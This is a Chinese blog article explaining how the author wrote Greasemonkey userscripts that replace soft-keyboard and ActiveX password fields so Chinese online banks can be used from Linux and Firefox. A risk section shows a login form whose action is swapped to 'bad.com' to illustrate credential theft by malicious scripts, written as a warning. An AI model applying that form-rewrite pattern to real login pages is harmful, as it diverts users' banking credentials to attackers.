Linux + Firefox 登陆网上银行-IT客

CODE:

<form method=post action="http://foo.com/cgi-bin/test.pl">
username:<input name=username type=text><br>
password:<input name=password type=password><br>
<input name=submit type=submit value="OK">
</form>　　如果我们用浏览器访问该页面并在用户名和密码部分填写zhang3和123.并点击OK按钮，就会将数据提交给http://foo.com/cgi- bin/test.pl处理。甚至你可以直接在你的浏览器地址栏上直接输入http://foo.com/cgi-bin/test.pl? username=z3&password=123 ,效果通常相同。
　　网上银行比这要复杂一些，因为很多银行存在一个图片”验证码“，这无法用直接提交的方式发送数据。必需登录银行指定的登录界面。
　　刚开始研究这个问题的时候，笔者尝试通过建立一个FireFox的扩展的方式登录网上银行，在深入研究了XUL、DOM等文档后，成功地开发出了自己的扩展，但随后发现，利用现有的Greaemonkey扩展是个更简单的方案。
　　Greasemonkey扩展既然可以运行Javascipt脚本，我们就能够利用脚本动态修改页面，使得其能够被Firefox显示并且能提交正确的数据。首先分析原因所在，其中最容易的就是建设银行。

建设银行

　　
　　建行网上银行的登陆入口

　　此页面的问题在于，如果使用Windows+IE ,当试图输入密码时，会打开一个软键盘来输入，这有一定的安全性，但也就只能防止某些可以记录键盘输入的间谍软件而已，但使用Firefox，就根本不能输入密码。

　其部分代码如下(除去了一些定义外观的部分):

CODE:

[Copy to clipboard]

         <td nowrap>证件号码：</td>          <td nowrap colspan=3><input name="USERID" type="text" title="证件号码"></td>
   <tr>
         <td nowrap>登录密码：</td>
         <td nowrap colspan=3><input id="LOGPASS" name="LOGPASS" type="password"  title="登录密码"  readOnly onKeyDown="Calc.password.value=this.value" onChange="Calc.password.value=this.value" onclick= "password1=this;showkeyboard();this.readOnly=1;Calc.password.value=''"></td> </tr>　　核心问题就是在上述代码中我用红色标出的readOnly属性，这使得我们不能够直接输入密码，而只能借助于前文所说的软键盘。
　　我写了下面的脚本，用来重写一个标准的密码框来取代原有的部分，内容如下:

CODE:

[Copy to clipboard]

1.// ==UserScript==
2.// @namespace    http://teenblog.org/tiantian
3.// @name       ccb Assist
4.// @description ccb Assist
5.// @include    https://ibsbjstar.ccb.com.cn/app/B2CMainPlat?CUSTYPE=0&TXCODE=CLOGIN
6.// ==/UserScript==
7.var passArea=document.getElementsByTagName("td")[104];
8.passArea.innerHTML='<input id="LOGPASS" name="LOGPASS" type="password" class="textlogin" size="20" minLength="6" maxLength="12" title="password">';
9.alertMessage='This page was modified by Greasemonkey extension./nThe extension use a user defined JavaScript./nThe Content of JavaScript is not related  with Greasemonkey./nBe care to use this./nCopyright: GPL V2 /nAuthor: maluyao at 163.com/nKnow Bugs: /n Can not logout/n' ;
10.alert(alertMessage);　　前4行都是描述性的。第5行指出了本脚本针对的网页。
　　第7行得到指定的<td>和</td>之间的内容，并在第8行中替换成我们自己的格式。第9行和第10行是弹出一个关于版权和警告信息的窗口，提醒用户注意。当然，最后这两行不是必需的。
　　
　　把此脚本命名为jianhang.user.js后，直接用Firefox打开。并安装。
　　现在用Firefox打开建行的登录界面，就能输入卡号和密码了，正确输入数据并且提交后，进入了下个界面。
　　　　在左上方能正确地看到本人的名字，下方显示的广东分行也是正确的（以前在广东开的户）。沉浸在喜悦当中的我，马上点右下的“不使用证书进入”。
　　唉！！！！，只能说十分遗憾。建行网站的内部仍然不支持IE，还的另想办法。
办法就是继续研究html界面，并用适当的内容替换之。因为工作量的关系，笔者放弃了对建设银行的接续研究。
　　中国银行的网上银行登录界面同样也有一个软键盘，但是用户可以选择使用或不使用之。从网站界面设计的方面评价，建设银行无疑是和中国银行有些差距了。国际话不能光在嘴上说。要落实在行动上。

交通银行

　　
　　接下来我们看看交通银行，交通银行的登陆界面

　　交行的登陆界面上用一个ActiveX控件输入密码，这在Linux + Firefox 的环境下是无法显示的。我们的办法是在登陆此界面后，用Firefox 的扩展来修改登陆界面上的内容。重新生成一个Firefox能够正确显示的表单(Form),交通银行的脚本如下:

CODE:

[Copy to clipboard]

1.// ==UserScript==
2.// @namespace    http://teenblog.org/tiantian
3.// @name       JiaoHang Assist
4.// @description JiaoHang Assist
5.// @include    https://pbank.95559.com.cn/personbank/common_logon.jsp
6.// ==/UserScript==
7.var addformhead=document.getElementsByTagName('td')[31];
8.alertMessage='This page was modified by Greasemonkey extension./nThe extension use a user defined JavaScript./nThe Content of JavaScript is not related  with Greasemonkey./nBe care to use this./nPlease input Card Number on "Card Number"/nPlease input your password on "PassWord"/nPlease Input adding code below "Picture Code"/nCopyright: GPL V2 /nAuthor: maluyao at 163.com/nKnow Bugs: /n Can not logout/n JIE JI Card Only/n' ;
9.addformhead.innerHTML='<form id="frmLogon" name="frmLogon" method="post" action=Bank >' +
10. '/n <input type="hidden" name="netType" value="0"/> '+
11.    '/n <input type="hidden" name="language" value="zh_CN"/> '+
12.    '/n <input type="hidden" name="userType" value="02"/> '+
13.    '/nCard Number<input name="cardNo" type="text"  maxLength="17" > '+
14.    '/n<br>/nPassWord<input type="password" id="password" name="password" > ' +
15.    '/n<br>Picture Code<input name="reqCode" type="text" maxLength="6" size="10" >' +
16.    '/n <input type="hidden" name="cardType" value="0" /> '+
17.
18.    '</form>'+
19. '<a href="javascript:document.getElementById(/'frmLogon/').submit()"><img src="/personbank/images/but-denglu.gif"></a>';
20.alert(alertMessage);　　第8行和第18行定义和显示了一个对话框，内容是对使用本脚本的客户机的一个警告信息，不是必要的。第9-19行中我们增加了一个新的表单，能够提交正确的数据。　　虽然界面目前被改的很丑陋，但能够工作。输入正确的数据后,可以进入网上银行，查看自己帐号的情况。

风险分析

　　从上面的例子里可以看出，Firefox的扩展功能十分的强大。可以直接对页面进行修改。但这里也存在相当大的风险。
　　比如如果某页面存在一个表单，定义如下:

CODE:

[Copy to clipboard]

1.<form method=post action="http://good.com/cgi-bin/test.pl">
2.用户名:<input id="username" name=username type=text ><br>
3.密　码:<input id="password" name=password type=text ><br>
4.<input name=submit type=submit value=”提交">
5.</form>　　这段内容原本会将数据提交到good.com上的test.pl处理，但如果恶意代码将其改为:

CODE:

[Copy to clipboard]

1.<form method=post action="http://bad.com/cgi-bin/test.pl">
2.用户名:<input id="username" name=username type=text ><br>
3.密　码:<input id="password" name=password type=text ><br>
4.<input name=submit type=submit value=”提交">
5.</form>　　这会导致原本应该发送给good.com的数据被发送给bad.com。风险极大。

招商银行

　　相比于上面两个银行，招商银行的难度要高一些。招商银行使用的ActiveX控件，能够使得卡号和密码在提交前就被ActiveX所加密,密文具有一定的随机性。然后再提交数据。笔者认为这并不是必要的，但毫无疑问，这种机制加大了我工作的难度。
　　
　　如果能分析出这个加密算法并用JavaScript实现，招商银行的问题也就解决了。从密码学的原理来说，已知明文和密文，分析出算法并不是件非常困难的事情。但这需要时间。这个问题的详细内容，请参考: http://bbs.chinaunix.net/viewthread.php?tid=749579&extra=page%3D2 。

　　目前笔者还没有分析出算法，但使用某种技巧，笔者能针对任意帐号和密码在自己的电脑上生成密文。这样虽然未知加密算法。但可以先得到自己帐号密码的密文内容，然后通过修改网页的方式提交出去。当然,这种方式暂时只能自学自用，不便公开。事实上，因为招行的网站有很多”桢“（Frame)。修改起来过于麻烦。目前的计划是不久以后注销掉招商银行的帐号。

　　据说工商银行的ActiveX也有类似的机制，因为没有工行帐号，就不准备进一步研究了。但相信也可以通过和招商银行类似的方式解决。

风险提示和后记

　　
　　对于一般的用户，特别要注意不要安装来路不明的扩展和脚本，这其中的风险几乎相当于自己给自己安装一个木马。因为除了JavaScript语言开发以外，Firefox的扩展还可以使用Java、C/C++等语言开发，能够实现非常底层的功能，甚至格式化你的硬盘。

　　感谢笔者现在的雇主—北大青鸟(北京华源）授权培训中心，没有给安排给我太多的工作任务，使得能够有足够的时间和精力，深入研究自由软件的各种技术，回报自由软件社区。